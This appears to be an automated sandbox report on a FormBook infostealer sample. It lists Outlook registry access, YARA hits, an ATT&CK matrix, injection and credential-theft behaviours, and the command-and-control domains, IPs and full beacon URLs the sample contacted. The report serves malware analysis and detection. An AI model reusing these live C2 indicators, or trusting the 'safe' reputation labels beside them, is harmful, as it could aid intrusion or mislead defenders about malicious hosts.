            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.616917024.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396307555.00000000002B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616838058.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396316461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616820930.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616853860.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.452537297.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.616973792.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396448093.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote Services1
            Email Collection            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		312
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Browser Session Hijacking            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            Remote System Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync114
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1556224 Sample: RN# D7521-RN-00353  REV-2.exe Startdate: 15/11/2024 Architecture: WINDOWS Score: 96 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected FormBook 2->41 43 Binary is likely a compiled AutoIt script file 2->43 45 3 other signatures 2->45 9 RN# D7521-RN-00353  REV-2.exe 2 2->9         started        process3 signatures4 57 Binary is likely a compiled AutoIt script file 9->57 59 Writes to foreign memory regions 9->59 61 Maps a DLL or memory area into another process 9->61 12 svchost.exe 9->12         started        process5 signatures6 63 Maps a DLL or memory area into another process 12->63 15 CuJYYyjxRgkNEt.exe 12->15 injected process7 signatures8 65 Maps a DLL or memory area into another process 15->65 67 Found direct / indirect Syscall (likely to bypass EDR) 15->67 18 xcopy.exe 1 20 15->18         started        process9 dnsIp10 31 www.sqlite.org 45.33.6.223, 49162, 80 LINODE-APLinodeLLCUS United States 18->31 29 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 18->29 dropped 47 Tries to steal Mail credentials (via file / registry access) 18->47 49 Tries to harvest and steal browser information (history, passwords, etc) 18->49 51 Maps a DLL or memory area into another process 18->51 53 Queues an APC in another process (thread injection) 18->53 23 CuJYYyjxRgkNEt.exe 18->23 injected 27 firefox.exe 18->27         started        file11 signatures12 process13 dnsIp14 33 estrela-b.online 162.241.63.77, 49175, 49176, 49177 UNIFIEDLAYER-AS-1US United States 23->33 35 micrhyms.info 15.197.148.33, 49171, 49172, 49173 TANDEMUS United States 23->35 37 9 other IPs or domains 23->37 55 Found direct / indirect Syscall (likely to bypass EDR) 23->55 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RN# D7521-RN-00353 REV-2.exe57%ReversingLabsWin32.Trojan.AutoitInject
            RN# D7521-RN-00353 REV-2.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://meanttobebroken.org/zdt7/?5RH=OdyTsfpKOp0%Avira URL Cloudsafe
            http://www.shintow.net/ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlUOw5UFltg9ddxyQI16qNu+e65Ogv/e38YRCJEvp7GjjWNBSB6vuUL3Vo0qU&WrGp=yRUDttthc40H6jfP0%Avira URL Cloudsafe
            http://www.mireela.pro/mdol/?5RH=IBR/N437Xoj/lvQ897DSFCGd1oR1jSFvQ9XvO2IN6lbwsaKUqIYS/t7V4RHRPO7VGkMU2dFR1OPoWNJQfvLnpgskAhvCg85lkqmyzGqwbfp9zK6j91HWEALvJgsG&WrGp=yRUDttthc40H6jfP0%Avira URL Cloudsafe
            http://www.micrhyms.info/uao9/?5RH=gsMVmNPJ8N9SSsJigSRkzHU8ucRHA0N0sVKqNnzNMDh6tN9OUV5giohWqtUcjyeiEwOtWu4dkyz3I4t4LNKsaZpWxiv3b+U2cgmSZgLKQ+77F4DmKxGHK+RD911B&WrGp=yRUDttthc40H6jfP0%Avira URL Cloudsafe
            https://www.shintow.net/ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlU0%Avira URL Cloudsafe
            http://www.mjmegartravel.online/t2sm/?WrGp=yRUDttthc40H6jfP&5RH=94IeUqPLX3ZZBpOCZoSY6HQmnr2N9SvCK3bXujG3CQTlZUuHvWSdlBBRCisXKpTA+iEUA4EAd7TxfJWKcng8Nu4RKxcBvf//lMLbliKMg02h9gbVNiMInhr1eLg30%Avira URL Cloudsafe
            http://www.ila.beauty/qq33/?WrGp=yRUDttthc40H6jfP&5RH=i6Dk+UJVjxglEXs3yyUE1WXG/wtHu1mV9FpOihhS4ziFAzHmIjfzSWYGuuWTb7Mve8esrSqeFR09QtNoutRLtyBsWM1L4jpBKikP70GTc17iz2FS/96s1feDLjv+0%Avira URL Cloudsafe
            http://www.estrela-b.online/62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE+XsifzX8e14uD6eFFfqVh5KNZSia3m0bcXelGS5q93MwJAmLErFoJd5x6JI2SQSwqfyhCjpW3AVwzoSZD5r0%Avira URL Cloudsafe
            http://www.meanttobebroken.org/zdt7/?5RH=OdyTsfpKOp+FbfSCrWaWA4zl2ndKvmvs0o0DPQC5l8EmE472eTQ0Sykym0VZOF0oXIsjWHJk3q5TqJLqfgnsjz8wdkFbxgxZ0u4ZxfA0ZKI/ytukIpl2H+uK2LJW&WrGp=yRUDttthc40H6jfP0%Avira URL Cloudsafe
            http://www.mjmegartravel.online/t2sm/0%Avira URL Cloudsafe
            http://www.mjmegartravel.online0%Avira URL Cloudsafe
            http://estrela-b.online/62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ila.beauty
            		76.223.54.146
            		truefalse
              		high
              estrela-b.online
              		162.241.63.77
              		truefalse
                		unknown
                www.meanttobebroken.org
                		141.193.213.11
                		truefalse
                  		high
                  mjmegartravel.online
                  		13.248.213.45
                  		truefalse
                    		unknown
                    www.mireela.pro
                    		69.57.163.227
                    		truefalse
                      		high
                      www.sqlite.org
                      		45.33.6.223
                      		truefalse
                        		high
                        ghs.googlehosted.com
                        		172.217.18.115
                        		truefalse
                          		high
                          micrhyms.info
                          		15.197.148.33
                          		truefalse
                            		unknown
                            www.micrhyms.info
                            		unknown
                            		unknownfalse
                              		unknown
                              www.mjmegartravel.online
                              		unknown
                              		unknownfalse
                                		unknown
                                www.estrela-b.online
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.shintow.net
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.mjmegartravel.online/t2sm/?WrGp=yRUDttthc40H6jfP&5RH=94IeUqPLX3ZZBpOCZoSY6HQmnr2N9SvCK3bXujG3CQTlZUuHvWSdlBBRCisXKpTA+iEUA4EAd7TxfJWKcng8Nu4RKxcBvf//lMLbliKMg02h9gbVNiMInhr1eLg3false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.shintow.net/ow7i/false
                                      		high
                                      http://www.shintow.net/ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlUOw5UFltg9ddxyQI16qNu+e65Ogv/e38YRCJEvp7GjjWNBSB6vuUL3Vo0qU&WrGp=yRUDttthc40H6jfPfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ila.beauty/qq33/?WrGp=yRUDttthc40H6jfP&5RH=i6Dk+UJVjxglEXs3yyUE1WXG/wtHu1mV9FpOihhS4ziFAzHmIjfzSWYGuuWTb7Mve8esrSqeFR09QtNoutRLtyBsWM1L4jpBKikP70GTc17iz2FS/96s1feDLjv+false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.meanttobebroken.org/zdt7/false
                                        		high
                                        http://www.meanttobebroken.org/zdt7/?5RH=OdyTsfpKOp+FbfSCrWaWA4zl2ndKvmvs0o0DPQC5l8EmE472eTQ0Sykym0VZOF0oXIsjWHJk3q5TqJLqfgnsjz8wdkFbxgxZ0u4ZxfA0ZKI/ytukIpl2H+uK2LJW&WrGp=yRUDttthc40H6jfPfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mireela.pro/mdol/false
                                          		high
                                          http://www.mjmegartravel.online/t2sm/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.micrhyms.info/uao9/?5RH=gsMVmNPJ8N9SSsJigSRkzHU8ucRHA0N0sVKqNnzNMDh6tN9OUV5giohWqtUcjyeiEwOtWu4dkyz3I4t4LNKsaZpWxiv3b+U2cgmSZgLKQ+77F4DmKxGHK+RD911B&WrGp=yRUDttthc40H6jfPfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.estrela-b.online/62tt/false
                                            		high
                                            http://www.estrela-b.online/62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE+XsifzX8e14uD6eFFfqVh5KNZSia3m0bcXelGS5q93MwJAmLErFoJd5x6JI2SQSwqfyhCjpW3AVwzoSZD5rfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zipfalse
                                              		high
                                              http://www.mireela.pro/mdol/?5RH=IBR/N437Xoj/lvQ897DSFCGd1oR1jSFvQ9XvO2IN6lbwsaKUqIYS/t7V4RHRPO7VGkMU2dFR1OPoWNJQfvLnpgskAhvCg85lkqmyzGqwbfp9zK6j91HWEALvJgsG&WrGp=yRUDttthc40H6jfPfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.micrhyms.info/uao9/false
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabxcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drfalse
                                                    		high
                                                    https://www.shintow.net/ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlUxcopy.exe, 00000004.00000002.617342732.0000000002D36000.00000004.10000000.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000002.617027194.0000000003436000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drfalse
                                                      		high
                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchxcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drfalse
                                                        		high
                                                        https://www.google.com/favicon.ico56Q8T4H.4.drfalse
                                                          		high
                                                          http://meanttobebroken.org/zdt7/?5RH=OdyTsfpKOpxcopy.exe, 00000004.00000002.617342732.000000000337E000.00000004.10000000.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000002.617027194.0000000003A7E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drfalse
                                                            		high
                                                            http://www.mjmegartravel.onlineCuJYYyjxRgkNEt.exe, 00000005.00000002.616917024.0000000000937000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drfalse
                                                              		high
                                                              http://estrela-b.online/62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeExcopy.exe, 00000004.00000002.617342732.00000000031EC000.00000004.10000000.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000002.617027194.00000000038EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.sqlite.org/copyright.html.xcopy.exe, 00000004.00000002.617737961.0000000061EB5000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drfalse
                                                                		high
                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  15.197.148.33
                                                                  		micrhyms.infoUnited States
                                                                  		7430TANDEMUSfalse
                                                                  45.33.6.223
                                                                  		www.sqlite.orgUnited States
                                                                  		63949LINODE-APLinodeLLCUSfalse
                                                                  141.193.213.11
                                                                  		www.meanttobebroken.orgUnited States
                                                                  		396845DV-PRIMARY-ASN1USfalse
                                                                  13.248.213.45
                                                                  		mjmegartravel.onlineUnited States
                                                                  		16509AMAZON-02USfalse
                                                                  76.223.54.146
                                                                  		www.ila.beautyUnited States
                                                                  		16509AMAZON-02USfalse
                                                                  69.57.163.227
                                                                  		www.mireela.proUnited States
                                                                  		25653FORTRESSITXUSfalse
                                                                  162.241.63.77
                                                                  		estrela-b.onlineUnited States
                                                                  		46606UNIFIEDLAYER-AS-1USfalse
                                                                  172.217.18.115
                                                                  		ghs.googlehosted.comUnited States
                                                                  		15169GOOGLEUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1556224
                                                                  Start date and time:2024-11-15 06:44:09 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 19s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:RN# D7521-RN-00353 REV-2.exe
                                                                  Detection:MAL
                                                                  Classification:mal96.troj.spyw.evad.winEXE@7/7@8/8
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: RN# D7521-RN-00353 REV-2.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  00:45:32API Interceptor2508x Sleep call for process: CuJYYyjxRgkNEt.exe modified
                                                                  00:45:37API Interceptor3007514x Sleep call for process: xcopy.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  15.197.148.330CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                                  • www.myjiorooms.services/fksk/
                                                                  RFQ.docxGet hashmaliciousFormBookBrowse
                                                                  • www.maryneedskidneys.info/tqdg/
                                                                  SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                  • www.energyparks.net/k47i/
                                                                  p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                  • www.hyman.life/7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8
                                                                  Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.ninesquare.games/42mc/
                                                                  IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                                  • www.jilifish.win/to3j/
                                                                  ekte.exeGet hashmaliciousFormBookBrowse
                                                                  • www.childlesscatlady.today/0l08/
                                                                  IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                  • www.jilifish.win/to3j/
                                                                  AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.1clickw2.net/9bnb/
                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                  • www.ethetf.digital/m7sk/
                                                                  45.33.6.2230CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zip
                                                                  RFQ.docxGet hashmaliciousFormBookBrowse
                                                                  • www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
                                                                  SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                                                                  Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
                                                                  SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                                                                  IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                                  • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                  ekte.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                  IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                  • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                  SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                  New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                  • www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.meanttobebroken.orgRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.11
                                                                  RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.11
                                                                  PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.11
                                                                  NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  www.ila.beautyRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  TCP-F02-24-1437-HRSC24110281.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  Indocount Invoice Amendment.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48
                                                                  18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.248.169.48

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  DV-PRIMARY-ASN1USRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.11
                                                                  https://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                  • 141.193.213.10
